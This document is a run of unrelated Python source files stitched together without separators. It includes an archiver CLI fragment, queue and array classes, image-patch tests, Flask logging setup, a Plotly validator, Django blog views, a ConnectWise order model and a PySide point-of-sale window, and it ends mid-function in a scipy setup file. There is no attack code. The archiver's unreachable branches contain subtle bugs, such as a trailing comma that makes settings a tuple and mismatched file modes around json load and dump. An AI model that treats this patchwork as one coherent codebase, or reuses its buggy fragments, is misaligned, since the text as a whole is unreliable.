
    activeName = getActiveName()
    settings = readSettings(activeName)
    if not len(settings['sourceDirectories']):
        print "Error: no source directories in the active index. Please add a source directory via 'add -s'"
    archiver = Archiver(
            settings = readSettings(activeName),
            data = readData(activeName))
    archiver.update()
    dumpSettings(archiver.settings,activeName)
    dumpData(archiver.data,activeName)

elif args.command == 'clean':

    raise NotImplementedError
    activeName = getActiveName()
    archiver = Archiver(
            settings = readSettings(activeName),
            data = readData(activeName))
    archiver.clean()
    dumpSettings(archiver.settings,activeName)
    dumpData(archiver.data,activeName)

elif args.command == 'copy':

    raise NotImplementedError
    activeName = getActiveName()
    settings = readSettings(activeName),
    if settings['archiveDirectory'] is None:
        print "ERROR Archive directory not set.  Use 'add -a' to set the archive directory."
        sys.exit()

    Index(
            settings = settings,
            data = readData(activeName)).copy()

elif args.command == 'diskimages':

    raise NotImplementedError
    if args.size is None or args.size == "DVD":
        size = 4.65*1<<20
    elif args.size == "CD":
        size = 645*1<<20
    elif args.size == "DVD":
        size = 4.65*1<<20
    elif args.size == "DVD-dual":
        size = 8.5*1<<30
    elif args.size == "BD":
        size = 25*1<<30
    elif args.size == "BD-dual":
        size = 50*1<<30
    elif args.size == "BD-tripple":
        size = 75*1<<30
    elif args.size == "BD-xl":
        size = 100*1<<30
    else:
        try:
            size = int(float(args.size))
        except:
            print 'ERROR: unable to coerce "%s" to float or int'%(args.size)
            sys.exit()

    activeName = getActiveName()
    settings = readSettings(activeName),

    # GET THE DIRECTORY ARGUMENT
    if args.directory is not None:
        directory = args.directory
    else:
        if settings['archiveDirectory'] is None:
            print "ERROR Archive directory not set and no directory specified.  Use 'diskimages -d' to specifiy the disk image directory or 'add -a' to set the archive directory."
            sys.exit()
        else: 
            directory = os.path.join(settings['archiveDirectory'],'Disk Images')

    # VALIDATE THE DIRECTORY 
    if not os.path.exists(directory):
        if args.create :
            os.makedirs(directory)
        else:
            print 'ERROR: no such directory "%s"'%(directory)
            sys.exit()
    elif not os.path.isdir(directory):
        print '"%s" is not a directory'%(directory)
        sys.exit()

    # get the FPBF argument
    if args.fpbf is not None:
        FPBF = True
    elif args.nofpbf is not None:
        FPBF = False
    else:
        FPBF = sys.platform == 'darwin'

    Index( settings = settings,
            data = readData(activeName)).diskimages(directory,size,FPBF)

elif args.command == 'settings':

    activeName = getActiveName()
    if args.export is not None:

        raise NotImplementedError
        with open(args.export,'rb') as fh:
            json.dump(readSettings(activeName),fh,indent=2,separators=(',', ': '))

    elif args.load is not None:

        raise NotImplementedError
        with open(args.export,'wb') as fh:
            settings = json.load(fh)
        # give a chance for the settings to be validated
        try:
            archiver = Archiver(settings=settings)
        except:
            print "ERROR: invalid settings file"

        dumpSettings(archiver.settings,args.name)

    elif args.edit is not None:

        settings = readSettings(activeName)
        old = settings['identifierSettings'][args.edit]
        new = edit(json.dumps(old,indent=2,separators=(',', ': ')))
        settings['identifierSettings'][args.edit]= json.loads(new)
        dumpSettings(settings,activeName)

    else :

        print json.dumps(readSettings(activeName),indent=2,separators=(',', ': '))

elif args.command == 'create':

    if args.name in indexes['names']:
        print "An index by the name '%s' already exists"%(args.name)
        sys.exit()

    import re
    validater = re.compile(r'^[-() _a-zA-Z0-9](?:[-() _.a-zA-Z0-9]+[-() _a-zA-Z0-9])$')
    if validater.match(args.name) is None:
        print "ERROR: names must be composed of letters, numbers, hypen, underscore, space and dot charactes an not end or begin with a dot"
        sys.exit()

    archiver = Index()

    dumpSettings(archiver.settings,args.name)
    dumpData(archiver.data,args.name)

    indexes['names'].append(args.name)

    dumpIndexes()

    # TODO: check if there are no other indexies.  if so, make the new one active.
    print "Created index '%s'"%(args.name)

elif args.command == 'save':

    raise NotImplementedError
    Index( settings = readSettings(getActiveName()),
            data = readData(getActiveName())).save(args.filename)


elif args.command == 'use':

    print indexes['names']
    if not args.name in indexes['names']:
        print "ERROR: No such index named '%s'"%(args.name)
        sys.exit()

    indexes['active'] =indexes['names'].index(args.name) 

    dumpIndexes()

elif args.command == 'delete':

    if not args.name in indexes['names']:
        print "ERROR: No such index named '%s'"%(args.name)
        sys.exit()

    nameIindex = indexes['names'].index(args.name)

    if indexes['active'] == nameIindex:
        print 'WARNING: deleting active index'
        indexes['active'] = None

    del indexes['names'][nameIindex]

    dumpIndexes()

else :

    print "unknown command %s"%(args.command)




"""
.. module:: mlpy.auxiliary.datastructs
   :platform: Unix, Windows
   :synopsis: Provides data structure implementations.

.. moduleauthor:: Astrid Jackson <ajackson@eecs.ucf.edu>
"""
from __future__ import division, print_function, absolute_import

import heapq
import numpy as np

from abc import ABCMeta, abstractmethod


class Array(object):
    """The managed array class.

    The managed array class pre-allocates memory to the given size
    automatically resizing as needed.

    Parameters
    ----------
    size : int
        The size of the array.

    Examples
    --------
    >>> a = Array(5)
    >>> a[0] = 3
    >>> a[1] = 6

    Retrieving an elements:

    >>> a[0]
    3
    >>> a[2]
    0

    Finding the length of the array:

    >>> len(a)
    2

    """
    def __init__(self, size):
        self._data = np.zeros((size,))
        self._capacity = size
        self._size = 0

    def __setitem__(self, index, value):
        """Set the the array at the index to the given value.

        Parameters
        ----------
        index : int
            The index into the array.
        value :
            The value to set the array to.

        """
        if index >= self._size:
            if self._size == self._capacity:
                self._capacity *= 2
                new_data = np.zeros((self._capacity,))
                new_data[:self._size] = self._data
                self._data = new_data

            self._size += 1

        self._data[index] = value

    def __getitem__(self, index):
        """Get the value at the given index.

        Parameters
        ----------
        index : int
            The index into the array.

        """
        return self._data[index]

    def __len__(self):
        """The length of the array.

        Returns
        -------
        int :
            The size of the array

        """
        return self._size


class Point2D(object):
    """A position in a 2d-coordinate system.

    Parameters
    ----------
    x : float, optional
        The x-position in a 2d-coordinate system. Default is 0.0.
    y : float, optional
        The y-position in a 2d-coordinate system. Default is 0.0.

    Attributes
    ----------
    x : float
        The x-position in a 2d-coordinate system.
    y : float
        The y-position in a 2d-coordinate system.

    """
    # Fixed attribute set keeps the many small point instances lightweight.
    __slots__ = ['x', 'y']

    def __init__(self, x=0.0, y=0.0):
        self.x = x
        self.y = y


class Point3D(object):
    """A position in a 3d-coordinate system.

    Parameters
    ----------
    x : float, optional
        The x-position in a 2d-coordinate system. Default is 0.0.
    y : float, optional
        The y-position in a 2d-coordinate system. Default is 0.0.
    z : float, optional
        The z-position in a 3d-coordinate system. Default is 0.0.

    Attributes
    ----------
    x : float
        The x-position in a 2d-coordinate system.
    y : float
        The y-position in a 2d-coordinate system.
    z : float
        The z-position in a 3d-coordinate system.

    """
    # Fixed attribute set keeps the many small point instances lightweight.
    __slots__ = ['x', 'y', 'z']

    def __init__(self, x=0.0, y=0.0, z=0.0):
        self.x = x
        self.y = y
        self.z = z


class Vector3D(Point3D):
    """A 3d-vector (currently just a named Point3D).

    .. todo::
        Implement vector functionality.

    Parameters
    ----------
    x : float, optional
        The x-position in a 2d-coordinate system. Default is 0.0.
    y : float, optional
        The y-position in a 2d-coordinate system. Default is 0.0.
    z : float, optional
        The z-position in a 3d-coordinate system. Default is 0.0.

    Attributes
    ----------
    x : float
        The x-position in a 2d-coordinate system.
    y : float
        The y-position in a 2d-coordinate system.
    z : float
        The z-position in a 3d-coordinate system.

    """

    def __init__(self, x=0.0, y=0.0, z=0.0):
        # Delegate storage entirely to the point base class.
        super(Vector3D, self).__init__(x, y, z)


class Queue(object):
    """Abstract base class for queues.

    Implements the behavior shared by every queue type (length,
    membership, iteration, formatting, lookup and removal); concrete
    queues subclass this and provide :meth:`push` and :meth:`pop`.

    See Also
    --------
    :class:`FIFOQueue`, :class:`PriorityQueue`

    """
    __metaclass__ = ABCMeta

    def __init__(self):
        self._queue = []

    def __len__(self):
        return len(self._queue)

    def __contains__(self, item):
        # Comparison errors count as "not present" rather than propagating.
        try:
            return item in self._queue
        except Exception:
            return False

    def __iter__(self):
        return iter(self._queue)

    def __str__(self):
        parts = ['{0}'.format(el) for el in self._queue]
        return '[' + ', '.join(parts) + ']'

    def __repr__(self):
        return ', '.join('{0}'.format(el) for el in self._queue)

    @abstractmethod
    def push(self, item):
        """Push a new element on the queue.

        Parameters
        ----------
        item :
            The element to push on the queue.

        """
        raise NotImplementedError

    @abstractmethod
    def pop(self):
        """Pop an element from the queue."""
        raise NotImplementedError

    def empty(self):
        """Check if the queue is empty.

        Returns
        -------
        bool :
            Whether the queue is empty.

        """
        return not self._queue

    def extend(self, items):
        """Extend the queue by a number of elements.

        Parameters
        ----------
        items : list
            A list of items.

        """
        for element in items:
            self.push(element)

    def get(self, item):
        """Return the element in the queue identical to `item`.

        Parameters
        ----------
        item :
            The element to search for.

        Returns
        -------
        The element in the queue identical to `item`. If the element
        was not found, None is returned.

        """
        try:
            position = self._queue.index(item)
        except Exception:
            return None
        return self._queue[position]

    def remove(self, item):
        """Remove an element from the queue.

        Parameters
        ----------
        item :
            The element to remove.

        """
        self._queue.remove(item)


class FIFOQueue(Queue):
    """The first-in-first-out (FIFO) queue.

    Elements are served in insertion order: the first element added
    is the first element removed.

    Examples
    --------
    >>> q = FIFOQueue()
    >>> q.push(5)
    >>> q.extend([1, 3, 7])
    >>> print q
    [5, 1, 3, 7]
    >>> q.pop()
    5

    See Also
    --------
    :class:`PriorityQueue`

    """
    def __init__(self):
        super(FIFOQueue, self).__init__()

    def push(self, item):
        """Push an element to the end of the queue.

        Parameters
        ----------
        item :
            The element to append.

        """
        self._queue.append(item)

    def pop(self):
        """Return the element at the front of the queue.

        Returns
        -------
        The first element in the queue.

        """
        front = self._queue.pop(0)
        return front

    def extend(self, items):
        """Append a list of elements at the end of the queue.

        Parameters
        ----------
        items : list
            List of elements.

        """
        self._queue.extend(items)


class PriorityQueue(Queue):
    """The priority queue.

    Each element is stored with an associated priority; elements with
    a smaller priority value are served first.  The queue is backed by
    a binary heap of ``(priority, element)`` pairs.

    Parameters
    ----------
    func : callable
        A callback computing an element's priority. By default the
        priority is the value of the element itself.

    Examples
    --------
    >>> q = PriorityQueue()
    >>> q.push(5)
    >>> q.extend([1, 3, 7])
    >>> q.pop()
    1

    See Also
    --------
    :class:`FIFOQueue`

    """
    def __init__(self, func=lambda x: x):
        super(PriorityQueue, self).__init__()

        self.func = func

    def __contains__(self, item):
        # Compare against the stored elements, ignoring the priorities.
        return any(item == element for _, element in self._queue)

    def __str__(self):
        pairs = ['({0},{1})'.format(priority, element)
                 for priority, element in self._queue]
        return '[' + ', '.join(pairs) + ']'

    def push(self, item):
        """Push an element on the priority queue.

        The element is stored as a ``(priority, element)`` pair so the
        heap orders by priority.

        Parameters
        ----------
        item :
            The element to push on the queue.

        """
        entry = (self.func(item), item)
        heapq.heappush(self._queue, entry)

    def pop(self):
        """Get the element with the highest priority.

        Get the element with the highest priority (i.e., smallest value).

        Returns
        -------
        The element with the highest priority.

        """
        _, element = heapq.heappop(self._queue)
        return element

    def get(self, item):
        """Return the element in the queue identical to `item`.

        Parameters
        ----------
        item :
            The element to search for.

        Returns
        -------
        The element in the queue identical to `item`. If the element
        was not found, None is returned.

        """
        for _, candidate in self._queue:
            if item == candidate:
                return candidate
        return None

    def remove(self, item):
        """Remove an element from the queue.

        Removing an arbitrary pair breaks the heap invariant, so the
        heap is rebuilt afterwards.

        Parameters
        ----------
        item :
            The element to remove.

        """
        super(PriorityQueue, self).remove(item)
        heapq.heapify(self._queue)

import unittest
import numpy as np
from bayesnet.image.util import img2patch, patch2img


class TestImg2Patch(unittest.TestCase):
    """Tests for img2patch: patch extraction values and output shapes."""

    def test_img2patch(self):
        # A 4x4 single-channel image with 3x3 patches at step 1 yields a
        # 2x2 grid of patches; check the values against explicit slices.
        image = np.arange(16).reshape(1, 4, 4, 1)
        patches = img2patch(image, size=3, step=1)
        grid = [
            [image[0, 0:3, 0:3, 0], image[0, 0:3, 1:4, 0]],
            [image[0, 1:4, 0:3, 0], image[0, 1:4, 1:4, 0]],
        ]
        expected = np.asarray(grid)[None, ..., None]
        self.assertTrue((patches == expected).all())

        # Shape-only checks over a mix of scalar and tuple size/step args.
        cases = [
            (np.random.randn(2, 5, 6, 3), (1, 1), (1, 2), (2, 5, 3, 1, 1, 3)),
            (np.random.randn(3, 10, 10, 2), 2, (3, 1), (3, 3, 9, 2, 2, 2)),
            (np.random.randn(1, 23, 17, 5), (3, 4), 3, (1, 7, 5, 3, 4, 5)),
        ]
        for image, size, step, shape in cases:
            self.assertEqual(shape, img2patch(image, size, step).shape)


class TestPatch2Img(unittest.TestCase):
    """Tests for patch2img: exact and overlap-summed reconstruction."""

    def test_patch2img(self):
        image = np.arange(16).reshape(1, 4, 4, 1)

        # Non-overlapping patches reconstruct the image exactly.
        tiles = img2patch(image, size=2, step=2)
        self.assertTrue((image == patch2img(tiles, (2, 2), (1, 4, 4, 1))).all())

        # Overlapping 3x3 patches at step 1: every pixel is counted once per
        # covering patch (corners 1x, edges 2x, the 2x2 center 4x).
        tiles = img2patch(image, size=3, step=1)
        expected = np.arange(0, 32, 2).reshape(1, 4, 4, 1)
        for row, col in ((0, 0), (0, -1), (-1, 0), (-1, -1)):
            # Corner values are all even, so floor division halves exactly.
            expected[0, row, col, 0] //= 2
        expected[0, 1:3, 1:3, 0] *= 2
        self.assertTrue((expected == patch2img(tiles, (1, 1), (1, 4, 4, 1))).all())


# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()

'''
logger_setup.py customizes the app's logging module. Each time an event is
logged the logger checks the level of the event (eg. debug, warning, info...).
If the event is above the approved threshold then it goes through. The handlers
do the same thing; they output to a file/shell if the event level is above their
threshold.
:Example:
        >> from website import logger
        >> logger.info('event', foo='bar')
**Levels**:
        - logger.debug('For debugging purposes')
        - logger.info('An event occurred, for example a database update')
        - logger.warning('Rare situation')
        - logger.error('Something went wrong')
        - logger.critical('Very very bad')
You can build a log incrementally as so:
        >> log = logger.new(date='now')
        >> log = log.bind(weather='rainy')
        >> log.info('user logged in', user='John')
'''

import datetime as dt
import logging
from logging.handlers import RotatingFileHandler
import pytz

from flask import request, session
from structlog import wrap_logger
from structlog.processors import JSONRenderer

from app import app

# Set the logging level from the app configuration.
app.logger.setLevel(app.config['LOG_LEVEL'])

# Remove the default stdout handler; structlog/file handlers are added below.
app.logger.removeHandler(app.logger.handlers[0])

# Timezone used to localize log timestamps.
TZ = pytz.timezone(app.config['TIMEZONE'])


def add_fields(_, level, event_dict):
    ''' Add custom fields (timestamp, level, client IP) to each record. '''
    now = dt.datetime.now()
    # Localize the naive timestamp, then render it in the configured
    # timezone and format.
    event_dict['timestamp'] = TZ.localize(now, True).astimezone\
        (pytz.timezone(app.config['TIMEZONE'])).strftime(app.config['TIME_FMT'])
    event_dict['level'] = level
    if request:
        try:
            # Prefer the originating client IP when behind a proxy.
            event_dict['ip_address'] = request.headers.get('X-Forwarded-For', request.remote_addr)
        except Exception:
            # Never let a malformed request break logging.
            # (Was a bare except; narrowed to Exception.)
            event_dict['ip_address'] = 'unknown'

    return event_dict

# Add a handler to write log messages to a rotating file.
# NOTE(review): the on/off toggle reads LOG_FILE but the path comes from
# LOG_FILENAME -- confirm both keys are defined in the app config.
if app.config.get('LOG_FILE'):
    file_handler = RotatingFileHandler(filename=app.config['LOG_FILENAME'],
                                       maxBytes=app.config['LOG_MAXBYTES'],
                                       backupCount=app.config['LOG_BACKUPS'],
                                       mode='a',
                                       encoding='utf-8')
    file_handler.setLevel(logging.DEBUG)
    app.logger.addHandler(file_handler)

# Wrap the application logger with structlog so each record passes through
# add_fields and is rendered as a single JSON line.
logger = wrap_logger(
    app.logger,
    processors=[
        add_fields,
        JSONRenderer(indent=None)
    ]
)
import _plotly_utils.basevalidators


class TextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
    """Validator for the `textfont` compound property of `scattersmith`."""

    def __init__(self, plotly_name="textfont", parent_name="scattersmith", **kwargs):
        # Callers may override the data class and its docs via kwargs.
        data_class_str = kwargs.pop("data_class_str", "Textfont")
        data_docs = kwargs.pop(
            "data_docs",
            """
            color

            colorsrc
                Sets the source reference on Chart Studio Cloud
                for `color`.
            family
                HTML font family - the typeface that will be
                applied by the web browser. The web browser
                will only be able to apply a font if it is
                available on the system which it operates.
                Provide multiple font families, separated by
                commas, to indicate the preference in which to
                apply fonts if they aren't available on the
                system. The Chart Studio Cloud (at
                https://chart-studio.plotly.com or on-premise)
                generates images on a server, where only a
                select number of fonts are installed and
                supported. These include "Arial", "Balto",
                "Courier New", "Droid Sans",, "Droid Serif",
                "Droid Sans Mono", "Gravitas One", "Old
                Standard TT", "Open Sans", "Overpass", "PT Sans
                Narrow", "Raleway", "Times New Roman".
            familysrc
                Sets the source reference on Chart Studio Cloud
                for `family`.
            size

            sizesrc
                Sets the source reference on Chart Studio Cloud
                for `size`.
""",
        )
        super(TextfontValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            data_class_str=data_class_str,
            data_docs=data_docs,
            **kwargs
        )

from django.core import serializers
from rest_framework.response import Response
from django.http import JsonResponse
# Import quote_plus in a way that works on both Python 2 and Python 3.
# (Was a bare `except: pass`, which also swallowed KeyboardInterrupt and
# any unrelated error raised during import.)
try:
    from urllib import quote_plus  # python 2
except ImportError:
    pass

try:
    from urllib.parse import quote_plus  # python 3
except ImportError:
    pass

from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger

from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone

from comments.forms import CommentForm
from comments.models import Comment
from .forms import PostForm
from .models import Post


def post_create(request):
    """Create a new Post.

    Only users who are both staff and superuser may create posts; anyone
    else gets a 404. On a valid submission the post is attributed to the
    requesting user and the browser is redirected to its detail page.
    """
    user = request.user
    # De Morgan of the original check: 404 unless staff AND superuser.
    if not (user.is_staff and user.is_superuser):
        raise Http404

    form = PostForm(request.POST or None, request.FILES or None)
    if not form.is_valid():
        # GET or invalid POST: re-render the form.
        return render(request, "post_form.html", {"form": form})

    instance = form.save(commit=False)
    instance.user = user  # attribute the post to the logged-in user
    instance.save()
    # message success
    messages.success(request, "Successfully Created")
    return HttpResponseRedirect(instance.get_absolute_url())


def post_detail(request, slug=None):
    """Display a single Post with its share link, comments, and comment form.

    Draft or future-dated posts are hidden (404) from users who are not
    both staff and superuser. When an authenticated user submits a valid
    comment form, the comment is created (optionally threaded under
    ``parent_id``) and the user is redirected back to the commented object.
    """
    instance = get_object_or_404(Post, slug=slug)
    # Hide unpublished content from regular visitors.
    if instance.publish > timezone.now().date() or instance.draft:
        if not request.user.is_staff or not request.user.is_superuser:
            raise Http404
    share_string = quote_plus(instance.content)

    initial_data = {
        "content_type": instance.get_content_type,
        "object_id": instance.id
    }
    form = CommentForm(request.POST or None, initial=initial_data)
    if form.is_valid() and request.user.is_authenticated():
        c_type = form.cleaned_data.get("content_type")
        content_type = ContentType.objects.get(model=c_type)
        obj_id = form.cleaned_data.get('object_id')
        content_data = form.cleaned_data.get("content")
        parent_obj = None
        # ``parent_id`` is optional: a missing value (int(None) -> TypeError)
        # or a non-numeric one (ValueError) means a top-level comment.
        # FIX: the original bare ``except:`` also swallowed SystemExit /
        # KeyboardInterrupt; catch only the int() conversion errors.
        try:
            parent_id = int(request.POST.get("parent_id"))
        except (TypeError, ValueError):
            parent_id = None

        if parent_id:
            parent_qs = Comment.objects.filter(id=parent_id)
            if parent_qs.exists() and parent_qs.count() == 1:
                parent_obj = parent_qs.first()

        new_comment, created = Comment.objects.get_or_create(
            user=request.user,
            content_type=content_type,
            object_id=obj_id,
            content=content_data,
            parent=parent_obj,
        )
        # Redirect after POST so a refresh does not resubmit the comment.
        return HttpResponseRedirect(new_comment.content_object.get_absolute_url())

    comments = instance.comments
    context = {
        "title": instance.title,
        "instance": instance,
        "share_string": share_string,
        "comments": comments,
        "comment_form": form,
    }
    return render(request, "post_detail.html", context)


def post_list(request):
    """List posts, paginated 8 per page.

    Staff/superusers see every post; everyone else only active ones.
    The ``q`` GET parameter performs a case-insensitive search over the
    title, content, and author's first/last name.
    """
    today = timezone.now().date()
    if request.user.is_staff or request.user.is_superuser:
        queryset_list = Post.objects.all()
    else:
        queryset_list = Post.objects.active()  # .order_by("-timestamp")

    query = request.GET.get("q")
    if query:
        search_filter = (
            Q(title__icontains=query)
            | Q(content__icontains=query)
            | Q(user__first_name__icontains=query)
            | Q(user__last_name__icontains=query)
        )
        # distinct() because the user-name joins can duplicate rows.
        queryset_list = queryset_list.filter(search_filter).distinct()

    page_request_var = "page"
    paginator = Paginator(queryset_list, 8)  # 8 posts per page
    page = request.GET.get(page_request_var)
    try:
        queryset = paginator.page(page)
    except PageNotAnInteger:
        # Non-integer page: deliver the first page.
        queryset = paginator.page(1)
    except EmptyPage:
        # Page out of range (e.g. 9999): deliver the last page.
        queryset = paginator.page(paginator.num_pages)

    return render(request, "post_list.html", {
        "object_list": queryset,
        "title": "List",
        "page_request_var": page_request_var,
        "today": today,
    })


def post_update(request, slug=None):
    """Edit the Post identified by ``slug``.

    Restricted (via 404) to users who are both staff and superuser.
    Redirects to the post's detail page after a successful save.
    """
    if not (request.user.is_staff and request.user.is_superuser):
        raise Http404
    instance = get_object_or_404(Post, slug=slug)
    form = PostForm(
        request.POST or None, request.FILES or None, instance=instance
    )
    if not form.is_valid():
        # GET or invalid POST: show the bound form again.
        return render(request, "post_form.html", {
            "title": instance.title,
            "instance": instance,
            "form": form,
        })

    instance = form.save(commit=False)
    instance.save()
    # ``extra_tags='html_safe'`` lets the template render the anchor as HTML.
    messages.success(request, "<a href='#'>Item</a> Saved",
                     extra_tags='html_safe')
    return HttpResponseRedirect(instance.get_absolute_url())


def post_delete(request, slug=None):
    """Delete the Post identified by ``slug`` and return to the list view.

    Restricted (via 404) to users who are both staff and superuser.
    NOTE(review): deletion currently happens on any HTTP method, including
    GET — consider requiring POST at the URL/template level.
    """
    if not (request.user.is_staff and request.user.is_superuser):
        raise Http404
    get_object_or_404(Post, slug=slug).delete()
    messages.success(request, "Successfully deleted")
    return redirect("posts:list")

from ..cw_model import CWModel


class Order(CWModel):
    """ConnectWise ``Order`` entity.

    Every attribute starts as ``None`` and is then (presumably) populated
    from ``json_dict`` by ``CWModel.__init__`` — confirm against CWModel.
    Fields originally annotated with ``*`` (company, status, salesRep)
    are required by the API.
    """

    def __init__(self, json_dict=None):
        # Field types, from the original per-line annotations:
        #   References: company*, contact, site, status*, opportunity,
        #     billingTerms, taxCode, salesRep*, shipToCompany/Contact/Site,
        #     billToCompany/Contact/Site.
        #   Strings: phone, phoneExt, email, orderDate, dueDate,
        #     poNumber (max 50), notes, description.
        #   Integers: id, locationId, businessUnitId.
        #   Booleans: billClosedFlag, billShippedFlag,
        #     restrictDownpaymentFlag, topCommentFlag, bottomCommentFlag.
        #   Integer lists: productIds, documentIds, invoiceIds, configIds.
        #   Numbers: total, taxTotal.  Metadata: _info.
        for field_name in (
            "id", "company", "contact", "phone", "phoneExt", "email",
            "site", "status", "opportunity", "orderDate", "dueDate",
            "billingTerms", "taxCode", "poNumber", "locationId",
            "businessUnitId", "salesRep", "notes", "billClosedFlag",
            "billShippedFlag", "restrictDownpaymentFlag", "description",
            "topCommentFlag", "bottomCommentFlag", "shipToCompany",
            "shipToContact", "shipToSite", "billToCompany",
            "billToContact", "billToSite", "productIds", "documentIds",
            "invoiceIds", "configIds", "total", "taxTotal", "_info",
        ):
            setattr(self, field_name, None)

        # initialize object with json dict
        super().__init__(json_dict)

from pydispatch import dispatcher
from PySide import QtCore, QtGui

import cbpos
logger = cbpos.get_logger(__name__)

from .page import BasePage

class MainWindow(QtGui.QMainWindow):
    """Top-level Coinbox POS window.

    Hosts the menu pages in a ``QTabWidget`` plus a toolbar of global
    actions, and saves/restores window geometry and toolbar state through
    ``cbpos.config``.
    """

    # Extension hooks registered via ``addInit``; each is called with the
    # window instance at the end of ``__init__`` (see ``callInit``).
    __inits = []
    
    def __init__(self):
        super(MainWindow, self).__init__()
        
        self.tabs = QtGui.QTabWidget(self)
        self.tabs.setTabsClosable(False)
        self.tabs.setIconSize(QtCore.QSize(32, 32))
        self.tabs.currentChanged.connect(self.onCurrentTabChanged)
        
        self.toolbar = self.addToolBar('Base')
        self.toolbar.setIconSize(QtCore.QSize(48,48)) #Suitable for touchscreens
        self.toolbar.setObjectName('BaseToolbar')
        
        toolbarStyle = cbpos.config['menu', 'toolbar_style']
        # The index in this list is the same as that in the configuration page
        available_styles = (
              QtCore.Qt.ToolButtonFollowStyle,
              QtCore.Qt.ToolButtonIconOnly,
              QtCore.Qt.ToolButtonTextOnly,
              QtCore.Qt.ToolButtonTextBesideIcon,
              QtCore.Qt.ToolButtonTextUnderIcon,
              )
        # Fall back to the platform default when the configured index is
        # missing, non-numeric, or out of range.
        try:
            toolbarStyle = available_styles[int(toolbarStyle)]
        except (ValueError, TypeError, IndexError):
            toolbarStyle = QtCore.Qt.ToolButtonFollowStyle
        self.toolbar.setToolButtonStyle(toolbarStyle)
        
        self.setCentralWidget(self.tabs)
        
        self.statusBar().showMessage(cbpos.tr._('Coinbox POS is ready.'))
        
        self.setWindowTitle('Coinbox')
        
        # Run extension __init__ hooks before building toolbar and menu.
        self.callInit()
        
        self.loadToolbar()
        self.loadMenu()
    
    def loadToolbar(self):
        """
        Loads the toolbar actions, restore toolbar state, and restore window geometry.
        """

        mwState = cbpos.config['mainwindow', 'state']
        mwGeom  = cbpos.config['mainwindow', 'geometry']

        for act in cbpos.menu.actions:
            # TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
            action = QtGui.QAction(QtGui.QIcon(act.icon), act.label, self)
            action.setShortcut(act.shortcut)
            action.triggered.connect(act.trigger)
            self.toolbar.addAction(action)


        # Restores the saved mainwindow's toolbars and docks, and then the
        # window geometry (values were stored base64-encoded; see
        # ``saveWindowState``).
        if mwState is not None:
            self.restoreState( QtCore.QByteArray.fromBase64(mwState) )
        if mwGeom is not None:
            self.restoreGeometry( QtCore.QByteArray.fromBase64(mwGeom) )
        else:
            # First run (no saved geometry): use a sane default size.
            self.setGeometry(0, 0, 800, 600)
    
    def loadMenu(self):
        """
        Load the menu root items and items into the QTabWidget with the appropriate pages. 
        """
        show_empty_root_items = cbpos.config['menu', 'show_empty_root_items']
        show_disabled_items = cbpos.config['menu', 'show_disabled_items']
        hide_tab_bar = not cbpos.config['menu', 'show_tab_bar']
        
        if hide_tab_bar:
            # Hide the tab bar and prepare the toolbar for extra QAction's
            self.tabs.tabBar().hide()
            # This pre-supposes that the menu items will come after the actions
            self.toolbar.addSeparator()
        
        for root in cbpos.menu.items:
            if not root.enabled and not show_disabled_items:
                continue
            
            if show_disabled_items:
                # Show all child items
                children = root.children
            else:
                # Filter out those which are disabled
                children = [i for i in root.children if i.enabled]
            
            # Hide empty menu root items
            if len(children) == 0 and not show_empty_root_items:
                continue
            
            # Add the tab
            widget = self.getTabWidget(children)
            icon = QtGui.QIcon(root.icon)
            index = self.tabs.addTab(widget, icon, root.label)
            widget.setEnabled(root.enabled)
            
            # Add the toolbar action if enabled
            if hide_tab_bar:
                # TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
                action = QtGui.QAction(QtGui.QIcon(icon), root.label, self)
                # ``n=index`` binds the tab index at definition time so each
                # action switches to its own tab (avoids late-binding closure).
                action.onTrigger = lambda n=index: self.tabs.setCurrentIndex(n)
                action.triggered.connect(action.onTrigger)
                self.toolbar.addAction(action)

    def onCurrentTabChanged(self, index, tabs=None):
        """Emit the newly-selected page's ``shown`` signal, if it has one."""
        if tabs is None:
            tabs = self.tabs
        widget = tabs.widget(index)
        try:
            signal = widget.shown
        except AttributeError:
            # Page does not expose a ``shown`` signal; nothing to notify.
            pass
        else:
            signal.emit()

    def getTabWidget(self, items):
        """
        Returns the appropriate window to be placed in the main QTabWidget,
        depending on the number of children of a root menu item.
        """
        count = len(items)
        if count == 0:
            # If there are no child items, just return an empty widget
            widget = QtGui.QWidget()
            widget.setEnabled(False)
            return widget
        elif count == 1:
            # If there is only one item, show it as is.
            logger.debug('Loading menu page for %s', items[0].name)
            widget = items[0].page()
            widget.setEnabled(items[0].enabled)
            return widget
        else:
            # If there are many children, add them in a QTabWidget
            tabs = QtGui.QTabWidget()
            # ``t=tabs`` binds the nested tab widget so ``shown`` signals fire
            # for pages inside it too.
            tabs.currentChanged.connect(lambda i, t=tabs: self.onCurrentTabChanged(i, t))

            for item in items:
                logger.debug('Loading menu page for %s', item.name)
                
                widget = item.page()
                icon = QtGui.QIcon(item.icon)
                tabs.addTab(widget, icon, item.label)
                widget.setEnabled(item.enabled)
            return tabs
    
    def saveWindowState(self):
        """
        Saves the main window state (position, size, toolbar positions)
        """
        # State is stored base64-encoded; ``unicode`` here implies this file
        # targets Python 2.
        mwState = self.saveState().toBase64() 
        mwGeom  = self.saveGeometry().toBase64() 
        cbpos.config['mainwindow', 'state'] = unicode(mwState)
        cbpos.config['mainwindow', 'geometry'] = unicode(mwGeom)
        cbpos.config.save()


    def closeEvent(self, event):
        """
        Perform necessary operations before closing the window.
        """
        self.saveWindowState()
        #do any other thing before closing...
        event.accept()
    
    @classmethod
    def addInit(cls, init):
        """
        Adds the `init` method to the list of extensions of the `MainWindow.__init__`.
        """
        cls.__inits.append(init)
    
    def callInit(self):
        """
        Handle calls to `__init__` methods of extensions of the MainWindow.
        """
        for init in self.__inits:
            init(self)

#!/usr/bin/env python
from __future__ import division, print_function, absolute_import

from os.path import join


def configuration(parent_package='', top_path=None):
    """Build the numpy.distutils configuration for the ``odr`` subpackage.

    Compiles the ODRPACK Fortran sources into the ``odrpack`` static
    library and links it into the ``__odrpack`` C extension, using an
    optimized BLAS when one is found.
    """
    import warnings
    from numpy.distutils.misc_util import Configuration
